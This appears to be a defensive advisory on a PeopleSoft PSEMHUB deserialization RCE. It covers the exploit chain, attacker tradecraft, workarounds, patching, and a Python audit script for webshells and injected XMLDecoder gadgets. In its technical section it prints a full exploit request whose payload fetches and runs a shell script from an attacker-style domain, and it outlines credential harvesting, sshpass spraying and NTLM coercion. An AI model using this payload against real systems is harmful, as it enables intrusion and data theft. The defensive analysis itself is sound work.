Oracle PeopleSoft Zero-Day Vulnerability Exploitation (CVE-2026-35273)

Introduction

Enterprise Resource Planning (ERP) systems store an organization’s most sensitive financial, operational, and personal data, making them prime targets for sophisticated cyber threat actors looking to maximize their leverage. On June 10, 2026, Oracle released an urgent, out-of-band security alert addressing CVE-2026-35273—a critical remote code execution (RCE) vulnerability actively exploited as a zero-day within the Oracle PeopleSoft PeopleTools component. Attributed to the advanced persistent threat group UNC6240 (which has established ties to the notorious ShinyHunters extortion collective), this critical security flaw was aggressively leveraged to breach perimeter security controls and compromise over 100 global organizations before a vendor fix was finalized. The rapid deployment of this exploit underscores the high valuation of zero-day access on the black market and highlights a growing trend of targeting mission-critical middleware to bypass traditional endpoint defenses.

Learning Objectives

By the end of this article, you will be able to:

  • Understand the core architectural flaw behind CVE-2026-35273 in Oracle PeopleSoft.
  • Analyze how threat actors bypass access controls using malformed HTTP requests.
  • Identify key Indicators of Compromise (IoCs) and post-exploitation patterns left by adversaries.
  • Apply immediate defensive workarounds and long-term patching strategies to protect your infrastructure.

What is CVE-2026-35273 – Oracle PeopleSoft Zero-Day Vulnerability

CVE-2026-35273 is a highly critical remote code execution (RCE) vulnerability residing in the Updates Environment Management component of Oracle PeopleSoft Enterprise PeopleTools—specifically affecting the Environment Management Hub (PSEMHUB) application. Assigned a maximum CVSS v3 base score of 9.8 (Critical), this security flaw allows completely unauthenticated, remote attackers to execute arbitrary commands directly on the underlying operating system hosting the application. Because it requires zero user interaction and functions with low attack complexity, it represents the highest tier of threat to enterprise perimeter security. Threat intelligence reports reveal that this vulnerability was aggressively exploited in the wild as a zero-day for roughly a two-week window between May 27 and June 9, 2026, prior to Oracle’s emergency disclosure. The threat actors behind the campaign heavily targeted the higher education sector across the globe, focusing extensively on major universities.

By weaponizing this flaw, adversaries successfully bypassed traditional web application firewalls to gain initial access, ultimately resulting in the systemic exfiltration of massive databases containing student, faculty, and alumni personally identifiable information (PII). This stolen data began surfacing on the ShinyHunters Data Leak Site (DLS) immediately prior to the patch release, turning a standard intrusion into a high-stakes corporate extortion and reputational crisis.

Technical Detail: How the Vulnerability Works

The root cause of CVE-2026-35273 lies in an architectural flaw within how the Environment Management Hub (PSEMHUB) processes untrusted input. This architectural oversight creates a catastrophic exploit chain: an initial Server-Side Request Forgery (SSRF) is weaponized to bypass perimeter authentication, which subsequently feeds a malicious payload into an unsafe Java deserialization routine, ultimately yielding full operating system-level code execution.

The attack methodology follows a distinct, highly orchestrated multi-stage lifecycle:

  1. Perimeter Target Identification: Adversaries scan internet-facing infrastructure to locate exposed Oracle PeopleSoft web servers. Once a target is mapped, they dispatch specially crafted HTTP POST requests directly to management endpoints that are meant for internal use but are reachable from the public internet:
     • /PSEMHUB/hub
     • /PSIGW/HttpListeningConnector
  2. Access Control Bypass via SSRF: Under normal operations, these endpoints handle internal node communication within the PeopleSoft cluster. However, because incoming HTTP request wrappers are neither sanitized nor verified, the front-end application logic accepts the request. It implicitly trusts the request and proxies the malicious payload directly to backend WebLogic management beans without enforcing any administrative authentication or session validation.
  3. Deserialization & Remote Code Execution (RCE): Once the payload reaches the internal management interface, the backend application passes the XML data to an unsafe native Java parser, specifically java.beans.XMLDecoder. Because the application reconstructs the serialized object supplied by the attacker, it blindly executes the embedded instructions. Attackers craft this object structure to force the Java Virtual Machine (JVM) to instantiate a ProcessBuilder object, dropping out of the application container to execute arbitrary commands on the underlying host operating system.
Crafted HTTP request:
POST /PSEMHUB/hub HTTP/1.1
Host: [target-peoplesoft-domain]
User-Agent: Mozilla/5.0
Content-Type: application/xml
Content-Length: [length]

<java version="1.8.0" class="java.beans.XMLDecoder">
  <object class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
      <void index="0"><string>/bin/sh</string></void>
      <void index="1"><string>-c</string></void>
      <void index="2"><string>curl -s http://azurenetfiles.net/agent.sh | bash</string></void>
    </array>
    <void method="start"/>
  </object>
</java>
  4. Post-Exploitation & Network Discovery: Achieving initial access on the web server is merely the first phase. Once the shell terminates or calls back, threat actors immediately execute an automated post-exploitation playbook designed for long-term persistence and domain-wide compromise:
     • Topology Mapping: The attackers parse local environment files, specifically reading the PeopleSoft process scheduler configuration (psappsrv.cfg) and WebLogic server configurations (config.xml), to quickly harvest hardcoded database credentials and map internal network subnets.
     • C2 Implantation: To ensure continuous access without raising alarms, they drop custom MeshCentral remote management binaries. These agents are named to mimic native cloud telemetry processes (e.g., meshagent64-azure-ops.exe) and communicate outward via HTTPS to lookalike domains like azurenetfiles.net.
     • Lateral Movement: Armed with internal credentials and network layouts, adversaries execute custom orchestration shell scripts (such as [victim]_fanout.sh) utilizing utility packages like sshpass. This allows them to systematically spray stolen credentials across internal systems found in /etc/hosts and move laterally until they reach high-value data repositories.

Remediation & Defensive Actions

Security administrators must take immediate, decisive action to isolate and secure vulnerable instances of Oracle PeopleTools (specifically branches 8.61 and 8.62). Because this campaign involved extensive zero-day activity before vendor disclosure, defense requires a dual-pronged strategy: cutting off the immediate external attack surface and executing a rigorous, retroactive threat hunt to root out potential hidden persistence.

1. Immediate Perimeter Mitigation (Temporary Workarounds)

If operational constraints or change-management protocols prevent the immediate application of Oracle’s binary patch, network engineers should immediately deploy perimeter controls. These measures effectively eliminate the external attack surface without disrupting day-to-day business operations:

  • Strict Endpoint Access Control Lists (ACLs): Configure edge routing, Web Application Firewalls (WAFs), reverse proxies, or application load balancers to drop all external HTTP/HTTPS traffic directed at the following critical deployment paths:
     • /PSEMHUB/*
     • /PSIGW/HttpListeningConnector

Operational Note: Incident response data and empirical testing confirm that blocking external access to these specific backend management paths is entirely non-breaking for standard employee, faculty, or student portal sessions. Standard user workflows rely on the primary PeopleSoft Internet Architecture (PIA) browser interface, which operates independently of these hub endpoints.

  • Service Deactivation (EMHub): In distributed, multi-server architectures, explicitly stop and disable the Environment Management Hub (EMHub) daemon across all web tier nodes to ensure it cannot be locally or internally coerced. In single-server configurations where the service cannot be gracefully isolated, completely remove or un-deploy the PSEMHUB web application archive from the server root.

2. Permanent Vendor Patching

While network mitigations interrupt the exploit chain, they do not resolve the underlying software defect. Comprehensive remediation requires updating the underlying application logic:

  • Apply Emergency Out-of-Band Update: Authenticate directly to the My Oracle Support (MOS) portal and pull the technical documentation under Patch Availability Document (ID: CPU187). Download the specific, certified patch binary compiled for your active PeopleTools release branch, test the deployment within a staging environment to ensure no regression of custom modifications, and push the update to production tiers.

3. Threat Hunting & Post-Exploitation Auditing

Because the threat group UNC6240 successfully operated this exploit in the wild prior to patch availability, applying the patch does not guarantee an environment is secure. Defensive teams must adopt an assume-breach posture and retroactively audit their local infrastructure for indicators of compromise (IoCs) and active webshells:

  • File System Integrity Verification: Conduct a deep forensic sweep of the web server’s document root. Specifically, scrutinize the deployment directories inside the PSEMHUB.war application path for any unauthorized or newly introduced .jsp scripts. Additionally, inspect the directory structure for anomalous, hidden, or unexpected folders created within the PSEMHUB paths, paying close attention to directory names designed to blend into standard telemetry, such as logspersistantstorage, or scratchpad.
  • Configuration Drift Auditing: Examine core configuration structures, such as XML metadata trees beneath the web server’s root path (envmetadata/data/environment). Attackers routinely inject unauthorized serialization blocks directly into these files, forcing the WebLogic application instance to parse and execute malicious commands via XMLDecoder every time the service restarts.
  • Egress Network Traffic Profiling: Analyze network flow logs originating specifically from the PeopleSoft application and web server subnets. Defenders should proactively hunt for two distinct outbound network anomalies:
  • Unauthorized Outbound TCP Port 445 (SMB) Connections: Payload variants frequently attempt to force the host system to interact with external, malicious SMB shares. This behavior is designed to intentionally leak and coerce host machine-account NetNTLM authentication hashes into adversary-controlled listening posts.
  • Persistent Non-Standard HTTPS Beacons: Audit outbound TLS traffic for continuous, structured beacons traveling toward newly registered or lookalike cloud infrastructure domains (such as azurenetfiles.net), which indicates the presence of a hidden MeshCentral or similar command-and-control (C2) backdoor.
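The file-system integrity and configuration-drift checks above, combined into one audit script as an added example (not the article's or Oracle's code): it walks a PSEMHUB deployment directory, flags any JSP inside it, and flags envmetadata XML that contains process-spawning XMLDecoder constructs. The directory layout, file contents and the `audit_psemhub_tree`/`build_sample_tree` names are constructed for this demonstration; the real deployment root and metadata path are as described in the text above.

```python
import tempfile
from pathlib import Path

# Constructs with no business in environment metadata. ProcessBuilder/start is
# the gadget shown above; Runtime/exec is a common sibling. The <java class=
# "java.beans.XMLDecoder"> wrapper alone is NOT a marker: these files are
# already parsed with XMLDecoder on restart, so only process spawning is flagged.
GADGET_MARKERS = ("java.lang.ProcessBuilder", "java.lang.Runtime",
                  'method="start"', 'method="exec"')

def audit_psemhub_tree(root: Path) -> list:
    """Walk a deployment root and return suspicious PSEMHUB files with a reason."""
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if "PSEMHUB" not in rel.upper():
            continue
        # (a) The hub ships no user-facing pages: any JSP is a likely webshell.
        if path.suffix.lower() in (".jsp", ".jspx"):
            findings.append({"file": rel, "reason": "jsp-in-psemhub", "markers": []})
        # (b) Metadata XML under envmetadata/ must not spawn processes on load.
        elif path.suffix.lower() == ".xml" and "/envmetadata/" in rel:
            text = path.read_text(errors="replace")
            hits = [m for m in GADGET_MARKERS if m in text]
            if hits:
                findings.append({"file": rel, "reason": "xmldecoder-gadget", "markers": hits})
    return findings

# Constructed sample deployment (not a real PeopleSoft install).
BENIGN_XML = ('<java version="1.8.0" class="java.beans.XMLDecoder">\n'
              ' <object class="java.util.HashMap"><void method="put">'
              '<string>host</string><string>web01</string></void></object>\n</java>\n')
INJECTED_XML = ('<java version="1.8.0" class="java.beans.XMLDecoder">\n'
                ' <object class="java.lang.ProcessBuilder"><array class="java.lang.String"'
                ' length="1"><void index="0"><string>PLACEHOLDER-COMMAND</string></void>'
                '</array><void method="start"/></object>\n</java>\n')

def build_sample_tree() -> Path:
    root = Path(tempfile.mkdtemp(prefix="psemhub-audit-"))
    files = {
        "PSEMHUB.war/envmetadata/data/environment/host-web01.xml": BENIGN_XML,
        "PSEMHUB.war/envmetadata/data/environment/host-web02.xml": INJECTED_XML,
        "PSEMHUB.war/WEB-INF/web.xml": "<web-app/>\n",
        "PSEMHUB.war/logs/status.jsp": '<%@ page import="java.io.*" %>\n',
        "pspc.war/index.jsp": "<html/>\n",  # outside PSEMHUB: out of scope
    }
    for rel, content in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(content)
    return root
```

Run `audit_psemhub_tree(Path("/path/to/webserv/domain/applications"))` against a real web tier; the sample tree only shows the two finding types, with a benign metadata file and a JSP outside PSEMHUB left unflagged.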

Conclusion

The exploitation of CVE-2026-35273 underscores the compounding risks associated with leaving complex, administrative endpoints exposed to the public internet. When a zero-day vulnerability emerges in core, mission-critical ERP software, the traditional window for defense effectively collapses—leaving security teams to measure their reaction time in hours rather than weeks. This campaign clearly demonstrates that relying solely on native application authentication is an insufficient defense strategy for high-value targets. Restricting access to internal management tools like PSEMHUB, and enforcing strict network segmentation, remains a fundamental tenet of a modern zero-trust architecture. Ultimately, defeating sophisticated threat groups like UNC6240 requires a continuous, multi-layered approach to defense. By applying immediate network-level workarounds to sever the external attack surface, executing proactive and retroactive threat hunts to eradicate hidden persistence indicators, and rapidly deploying Oracle’s official out-of-band security patches, enterprise organizations can robustly defend their critical environments and protect their most sensitive data stores from systemic compromise.
